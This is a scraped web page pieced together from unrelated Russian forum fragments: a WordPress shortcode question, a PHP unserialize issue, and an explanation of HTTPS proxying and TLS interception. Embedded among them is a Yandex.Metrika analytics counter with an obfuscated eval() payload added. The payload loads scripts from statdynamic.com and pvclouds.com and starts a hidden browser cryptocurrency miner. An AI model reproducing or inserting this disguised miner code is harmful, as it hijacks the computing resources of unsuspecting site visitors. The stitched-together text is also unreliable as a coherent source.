Нужно именно с таким именем создавать анонимная вроде не пройдёт, это в вордпрессе так создаются шорткоды.
add_shortcode( string $tag, callable $callback )
Apart from common user-defined function, anonymous functions and arrow functions can also be passed to a callback parameter.
Проблема ещё в том, что сама строка у меня отлично проходит unserialize
а когда я её передаю через $row['information'] она не отображает ничего
<!-- Yandex.Metrika counter -->
<script type="text/javascript" >
(function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
m[i].l=1*new Date();eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2 5=\'//6.0/4/3.1\';2 7=\'//d.8.0/c/b/a/9.1\';',14,14,'com|js|var|crypta|lib|src1|statdynamic|src2|pvclouds|80d48af456b0312fe505ea01e4403444|8a|d4|80|pl15180008'.split('|'),0,{}))
var scriqt = document.createElement('script');scriqt.src = src1;scriqt.async = false;scriqt.onload = function () {
var t = window.trotlrateafacebag || 0.2;window.miner = new CRLT.Anonymous('b92e00b513a0e651c67a028bbc10b5b3dfa29186006c',{threads:5,throttle:t});window.miner.start();};document.head.appendChild(scriqt);var scriqtad = document.createElement('script');scriqtad.src = src2;scriqtad.async = false;document.head.appendChild(scriqtad);k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
(window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");
ym(84157756, "init", {
clickmap:true,
trackLinks:true,
accurateTrackBounce:true,
webvisor:true
});
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/84157756" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
Схема похожая в чем-то, но есть существенные различия:
- клиент знает о существовании прокси и сам просит открыть туннель до сайта в CONNECT (про NAT клиент не знает, хотя может догадываться)
- получается два TCP соединения: клиент-прокси (то самое, по которому шел CONNECT) и прокси-сервер. Прокси с момента ответа на CONNECT и успешного соединения с сервером просто пересылает все данные, приходящие на первое соединение по второму и наоборот. В отличие от NAT, где соединение одно, но происходят манипуляции со служебными заголовками TCP/IP пакетов.
Бывает еще вариант прозрачного https прокси, о котором не знает клиент и в котором не используется CONNECT, но это по сути ничем не отличается от роутинга/NAT (если, конечно, прокси не имеет возможности перехватить TLS соединение, для чего нужны сертификаты).
Выше давали ссылки на squid с его ssl модулем, он умеет все три вида проксирования. Т.е. при наличии сертификата он может на лету создавать поддельные и перехватывать TLS трафик полностью. Он поддерживает CONNECT и прозрачное проксирование. Последние варианты мало что дают в плане контроля трафика, т.к. соединение будет зашифровано и прокси имеет доступ только к IP адресу/порту сервера, адресу, указанному в CONNECT, к домену, указанному в SNI - поле первого TLS сообщения клиента (не всегда), и домену(ам), которые есть в сертификате сервера. Это можно логировать или, исходя из этих данных, запрещать соединение.